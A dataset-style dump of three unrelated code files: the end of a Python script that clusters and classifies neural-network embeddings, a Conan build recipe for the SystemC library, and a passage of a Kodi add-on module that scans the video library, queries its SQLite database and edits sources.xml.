val_loader:\r\n    data = data.to(device)\r\n    output_ = model_embedding(model, data)\r\n    if not flag:\r\n        output = output_.copy()\r\n        flag = True\r\n    else:\r\n        output = np.concatenate([output, output_])\r\n\r\nprint(output.shape, train_window.shape)  # embeddings vs. raw windows\r\n\r\n# use PCA to reduce the embedding dimension for visualization\r\nfrom sklearn.decomposition import PCA\r\n\r\npca = PCA(n_components = 5)\r\npca.fit(output.squeeze(1))\r\n\r\nprint(pca.explained_variance_ratio_)\r\n\r\nvalid_2 = pca.transform(output.squeeze(1))\r\n\r\ncolors = ['blue' if t == 0 else 'red' for t in train_label_]\r\n\r\nplt.scatter(valid_2[:, 0], valid_2[:, 1], c=colors)\r\nplt.show()\r\n\r\n#% unsupervised spectral clustering\r\nclustering = SpectralClustering(n_clusters=2, assign_labels='discretize', random_state=0).fit(output.squeeze(1))\r\n\r\nresult_label = clustering.labels_\r\n\r\ntrue_label = train_label_.numpy()\r\n\r\nprint(confusion_matrix(true_label, result_label))\r\n\r\n#%% supervised SVM\r\nfrom sklearn import svm\r\nclf = svm.SVC(kernel = 'poly', gamma = 200)\r\nclf.fit(output.squeeze(1), train_label_)\r\nsvm_label = clf.predict(output.squeeze(1))\r\n\r\nprint(confusion_matrix(train_label_.numpy(), svm_label))\r\n
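\r\n# Added illustrative follow-up (not part of the original script): the SVM is\r\n# fit and evaluated on the same embeddings, so the agreement below is training\r\n# accuracy rather than a generalization estimate.\r\nprint('SVM training accuracy: %.3f' % (svm_label == train_label_.numpy()).mean())\r\n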
\"\"\"SystemC is a set of C++ classes and macros which provide\n an event-driven simulation interface.\"\"\"\n homepage = \"https://www.accellera.org/\"\n url = \"https://github.com/conan-io/conan-center-index\"\n license = \"Apache-2.0\"\n topics = (\"simulation\", \"modeling\", \"esl\", \"tlm\")\n\n settings = \"os\", \"arch\", \"compiler\", \"build_type\"\n options = {\n \"shared\": [True, False],\n \"fPIC\": [True, False],\n \"disable_async_updates\": [True, False],\n \"disable_copyright_msg\": [True, False],\n \"disable_virtual_bind\": [True, False],\n \"enable_assertions\": [True, False],\n \"enable_immediate_self_notifications\": [True, False],\n \"enable_pthreads\": [True, False],\n \"enable_phase_callbacks\": [True, False],\n \"enable_phase_callbacks_tracing\": [True, False],\n }\n default_options = {\n \"shared\": False,\n \"fPIC\": True,\n \"disable_async_updates\": False,\n \"disable_copyright_msg\": False,\n \"disable_virtual_bind\": False,\n \"enable_assertions\": True,\n \"enable_immediate_self_notifications\": False,\n \"enable_pthreads\": False,\n \"enable_phase_callbacks\": False,\n \"enable_phase_callbacks_tracing\": False,\n }\n\n generators = \"cmake\"\n\n @property\n def _source_subfolder(self):\n return \"source_subfolder\"\n\n @property\n def _is_msvc(self):\n return str(self.settings.compiler) in [\"Visual Studio\", \"msvc\"]\n\n def export_sources(self):\n self.copy(\"CMakeLists.txt\")\n for patch in self.conan_data.get(\"patches\", {}).get(self.version, []):\n self.copy(patch[\"patch_file\"])\n\n def config_options(self):\n if self.settings.os == \"Windows\":\n del self.options.fPIC\n del self.options.enable_pthreads\n\n def configure(self):\n if self.options.shared:\n del self.options.fPIC\n\n def validate(self):\n if self.settings.os == \"Macos\":\n raise ConanInvalidConfiguration(\"Macos build not supported\")\n\n if self.settings.os == \"Windows\" and self.options.shared:\n raise ConanInvalidConfiguration(\"Building SystemC as a shared library on Windows is currently not supported\")\n\n def source(self):\n tools.get(**self.conan_data[\"sources\"][self.version],\n destination=self._source_subfolder, strip_root=True)\n\n @functools.lru_cache(1)\n def _configure_cmake(self):\n cmake = CMake(self)\n cmake.definitions[\"DISABLE_ASYNC_UPDATES\"] = \\\n self.options.disable_async_updates\n cmake.definitions[\"DISABLE_COPYRIGHT_MESSAGE\"] = \\\n self.options.disable_copyright_msg\n cmake.definitions[\"DISABLE_VIRTUAL_BIND\"] = \\\n self.options.disable_virtual_bind\n cmake.definitions[\"ENABLE_ASSERTIONS\"] = \\\n self.options.enable_assertions\n cmake.definitions[\"ENABLE_IMMEDIATE_SELF_NOTIFICATIONS\"] = \\\n self.options.enable_immediate_self_notifications\n cmake.definitions[\"ENABLE_PTHREADS\"] = \\\n self.options.get_safe(\"enable_pthreads\", False)\n cmake.definitions[\"ENABLE_PHASE_CALLBACKS\"] = \\\n self.options.get_safe(\"enable_phase_callbacks\", False)\n cmake.definitions[\"ENABLE_PHASE_CALLBACKS_TRACING\"] = \\\n self.options.get_safe(\"enable_phase_callbacks_tracing\", False)\n cmake.configure()\n return cmake\n\n def build(self):\n for patch in self.conan_data.get(\"patches\", {}).get(self.version, []):\n tools.patch(**patch)\n cmake = self._configure_cmake()\n cmake.build()\n\n def package(self):\n self.copy(\"LICENSE\", dst=\"licenses\", src=self._source_subfolder)\n self.copy(\"NOTICE\", dst=\"licenses\", src=self._source_subfolder)\n cmake = self._configure_cmake()\n cmake.install()\n tools.rmdir(os.path.join(self.package_folder, \"lib\", 
\"cmake\"))\n tools.rmdir(os.path.join(self.package_folder, \"share\"))\n\n def package_info(self):\n self.cpp_info.set_property(\"cmake_file_name\", \"SystemCLanguage\")\n self.cpp_info.set_property(\"cmake_target_name\", \"SystemC::systemc\")\n # TODO: back to global scope in conan v2 once cmake_find_package* generators removed\n self.cpp_info.components[\"_systemc\"].libs = [\"systemc\"]\n if self.settings.os in [\"Linux\", \"FreeBSD\"]:\n self.cpp_info.components[\"_systemc\"].system_libs = [\"pthread\"]\n if self._is_msvc:\n self.cpp_info.components[\"_systemc\"].cxxflags.append(\"/vmg\")\n\n # TODO: to remove in conan v2 once cmake_find_package* generators removed\n self.cpp_info.filenames[\"cmake_find_package\"] = \"SystemCLanguage\"\n self.cpp_info.filenames[\"cmake_find_package_multi\"] = \"SystemCLanguage\"\n self.cpp_info.names[\"cmake_find_package\"] = \"SystemC\"\n self.cpp_info.names[\"cmake_find_package_multi\"] = \"SystemC\"\n self.cpp_info.components[\"_systemc\"].names[\"cmake_find_package\"] = \"systemc\"\n self.cpp_info.components[\"_systemc\"].names[\"cmake_find_package_multi\"] = \"systemc\"\n self.cpp_info.components[\"_systemc\"].set_property(\"cmake_target_name\", \"SystemC::systemc\")\n","repo_name":"orgTestCodacy11KRepos110MB/repo-4943-conan-center-index","sub_path":"recipes/systemc/all/conanfile.py","file_name":"conanfile.py","file_ext":"py","file_size_in_byte":5427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"15150529521","text":"# -*- coding: utf-8 -*-\r\nimport xbmc\r\n\r\nfrom core.libs import *\r\n\r\n\r\ndef run_rpc(payload):\r\n logger.trace()\r\n try:\r\n data = jsontools.load_json(xbmc.executeJSONRPC(jsontools.dump_json(payload)))\r\n except Exception:\r\n logger.error()\r\n return [\"error\"]\r\n\r\n return data\r\n\r\n\r\ndef update(path=''):\r\n logger.trace()\r\n\r\n payload = {\r\n \"jsonrpc\": \"2.0\",\r\n \"method\": \"VideoLibrary.Scan\",\r\n \"id\": 1,\r\n \"directory\": path\r\n }\r\n\r\n while xbmc.getCondVisibility('Library.IsScanningVideo()'):\r\n xbmc.sleep(500)\r\n\r\n run_rpc(payload)\r\n\r\n\r\ndef clean(mostrar_dialogo=False):\r\n \"\"\"\r\n limpia la libreria de elementos que no existen\r\n @param mostrar_dialogo: muestra el cuadro de progreso mientras se limpia la biblioteca\r\n @type mostrar_dialogo: bool\r\n \"\"\"\r\n logger.info()\r\n payload = {\"jsonrpc\": \"2.0\", \"method\": \"VideoLibrary.Clean\", \"id\": 1,\r\n \"params\": {\"showdialogs\": mostrar_dialogo}}\r\n data = run_rpc(payload)\r\n\r\n if data.get('result', False) == 'OK':\r\n return True\r\n\r\n return False\r\n\r\n\r\ndef search_path_db(path):\r\n path = filetools.normalize_dir(path)\r\n\r\n sql = 'SELECT strPath FROM path WHERE strPath LIKE \"%s\"' % path\r\n nun_records, records = execute_sql_kodi(sql)\r\n if nun_records >= 1:\r\n logger.debug(records[0][0])\r\n return records[0][0]\r\n return None\r\n\r\n\r\ndef add_path_db(path, **kwargs):\r\n logger.trace()\r\n\r\n # Buscamos el idPath\r\n if not kwargs.get('idPath'):\r\n nun_records, records = execute_sql_kodi('SELECT MAX(idPath) FROM path')\r\n if nun_records == 1:\r\n kwargs['idPath'] = records[0][0] + 1\r\n else:\r\n kwargs['idPath'] = 0\r\n\r\n # Buscamos el idParentPath\r\n sql = 'SELECT idPath, strPath FROM path where strPath LIKE \"%s\"' % filetools.normalize_dir(filetools.dirname(path))\r\n nun_records, records = execute_sql_kodi(sql)\r\n if nun_records == 1:\r\n kwargs['idParentPath'] = records[0][0]\r\n\r\n else:\r\n sql = 'INSERT 
\r\n\r\ndef search_path_db(path):\r\n    path = filetools.normalize_dir(path)\r\n\r\n    sql = 'SELECT strPath FROM path WHERE strPath LIKE \"%s\"' % path\r\n    nun_records, records = execute_sql_kodi(sql)\r\n    if nun_records >= 1:\r\n        logger.debug(records[0][0])\r\n        return records[0][0]\r\n    return None\r\n\r\n\r\ndef add_path_db(path, **kwargs):\r\n    logger.trace()\r\n\r\n    # determine the idPath\r\n    if not kwargs.get('idPath'):\r\n        nun_records, records = execute_sql_kodi('SELECT MAX(idPath) FROM path')\r\n        if nun_records == 1:\r\n            kwargs['idPath'] = records[0][0] + 1\r\n        else:\r\n            kwargs['idPath'] = 0\r\n\r\n    # determine the idParentPath\r\n    sql = 'SELECT idPath, strPath FROM path where strPath LIKE \"%s\"' % filetools.normalize_dir(filetools.dirname(path))\r\n    nun_records, records = execute_sql_kodi(sql)\r\n    if nun_records == 1:\r\n        kwargs['idParentPath'] = records[0][0]\r\n\r\n    else:\r\n        # the parent path is missing, so insert it first\r\n        sql = 'INSERT INTO path (idPath, strPath, scanRecursive, useFolderNames, noUpdate, exclude) VALUES ' \\\r\n              '(%s, \"%s\", 0, 0, 0, 0)' % (kwargs['idPath'], filetools.normalize_dir(filetools.dirname(path)))\r\n        execute_sql_kodi(sql)\r\n        kwargs['idParentPath'] = kwargs['idPath']\r\n        kwargs['idPath'] += 1\r\n\r\n    kwargs['strPath'] = filetools.normalize_dir(path)\r\n    sql = 'INSERT INTO path (%s) VALUES (%s)' % (\r\n        ', '.join(kwargs.keys()),\r\n        ', '.join(['\"%s\"' % v for v in kwargs.values()])\r\n    )\r\n    execute_sql_kodi(sql)\r\n\r\n\r\ndef execute_sql_kodi(sql):\r\n    \"\"\"\r\n    Runs the given SQL query against Kodi's video database\r\n    @param sql: valid SQL query\r\n    @type sql: str\r\n    @return: number of records modified or returned by the query\r\n    @rtype nun_records: int\r\n    @return: list with the result of the query\r\n    @rtype records: list of tuples\r\n    \"\"\"\r\n    logger.trace()\r\n\r\n    nun_records = 0\r\n    records = None\r\n    conn = None\r\n\r\n    # pick the MyVideos*.db file (Python 2 / Kodi-era code: filter() returns a list here)\r\n    file_db = filter(\r\n        lambda x: x.startswith('MyVideos'),\r\n        os.listdir(xbmc.translatePath(\"special://userdata/Database\"))\r\n    )[0]\r\n\r\n    file_db = os.path.join(xbmc.translatePath(\"special://userdata/Database\"), file_db)\r\n\r\n    try:\r\n        import sqlite3\r\n        conn = sqlite3.connect(file_db)\r\n        cursor = conn.cursor()\r\n\r\n        logger.info(\"Running sql: %s\" % sql)\r\n        cursor.execute(sql)\r\n        conn.commit()\r\n\r\n        records = cursor.fetchall()\r\n        if sql.lower().startswith(\"select\"):\r\n            nun_records = len(records)\r\n            if nun_records == 1 and records[0][0] is None:\r\n                nun_records = 0\r\n                records = []\r\n        else:\r\n            nun_records = conn.total_changes\r\n\r\n        conn.close()\r\n        logger.info(\"Query executed. Records: %s\" % nun_records)\r\n\r\n    except Exception:\r\n        logger.error()\r\n        if conn:\r\n            conn.close()\r\n\r\n    return nun_records, records\r\n
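\r\n# Illustrative usage (added note, not part of the original module): the helper\r\n# returns both a row count and the rows themselves, e.g.\r\n#   nun_records, records = execute_sql_kodi('SELECT COUNT(*) FROM path')\r\n#   if nun_records:\r\n#       logger.debug(\"paths in the library: %s\" % records[0][0])\r\n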
\r\n\r\ndef get_video_sources():\r\n    logger.trace()\r\n    from xml.dom import minidom\r\n\r\n    sources_path = xbmc.translatePath(\"special://userdata/sources.xml\")\r\n\r\n    if not os.path.exists(sources_path):\r\n        return []\r\n\r\n    xmldoc = minidom.parse(sources_path)\r\n    video = xmldoc.childNodes[0].getElementsByTagName(\"video\")[0]\r\n    paths = video.getElementsByTagName(\"path\")\r\n    return [p.firstChild.data for p in paths]\r\n\r\n\r\ndef add_video_source(path, name):\r\n    logger.trace()\r\n    from xml.dom import minidom\r\n\r\n    name = unicode(name, 'utf8')\r\n\r\n    sources_path = xbmc.translatePath(\"special://userdata/sources.xml\")\r\n\r\n    if os.path.exists(sources_path):\r\n        xmldoc = minidom.parse(sources_path)\r\n    else:\r\n        # create the document from scratch\r\n        xmldoc = minidom.Document()\r\n        nodo_sources = xmldoc.createElement(\"sources\")\r\n\r\n        for t in ['programs', 'video', 'music', 'picture', 'files']:\r\n            nodo_type = xmldoc.createElement(t)\r\n            element_default = xmldoc.createElement(\"default\")\r\n            element_default.setAttribute(\"pathversion\", \"1\")\r\n            nodo_type.appendChild(element_default)\r\n            nodo_sources.appendChild(nodo_type)\r\n        xmldoc.appendChild(nodo_sources)\r\n\r\n    # find the video node\r\n    nodo_video = xmldoc.childNodes[0].getElementsByTagName(\"video\")[0]\r\n\r\n    # look for the path among the path nodes contained in the video node\r\n    nodos_paths = nodo_video.getElementsByTagName(\"path\")\r\n    list_path = [p.firstChild.data for p in nodos_paths]\r\n    logger.debug(list_path)\r\n    if path in list_path:\r\n        logger.debug(\"Path %s is already in sources.xml\" % path)\r\n        return\r\n    logger.debug(\"Path %s is NOT in sources.xml\" % path)\r\n\r\n    # if we get here, the path is not in sources.xml, so add it\r\n    nodo_source = xmldoc.createElement(\"source\")\r\n\r\n    # <name> node\r\n    nodo_name = xmldoc.createElement(\"name\")\r\n    nodo_name.appendChild(xmldoc.createTextNode(name))\r\n    nodo_source.appendChild(nodo_name)\r\n\r\n    # <path> node\r\n    nodo_path = xmldoc.createElement(\"path\")\r\n    nodo_path.setAttribute(\"pathversion\", \"1\")\r\n    nodo_path.appendChild(xmldoc.createTextNode(path))\r\n    nodo_source.appendChild(nodo_path)\r\n\r\n    # <allowsharing> node\r\n    nodo_allowsharing = xmldoc.createElement(\"allowsharing\")\r\n    nodo_allowsharing.appendChild(xmldoc.createTextNode('true'))\r\n    nodo_source.appendChild(nodo_allowsharing)\r\n\r\n    # add to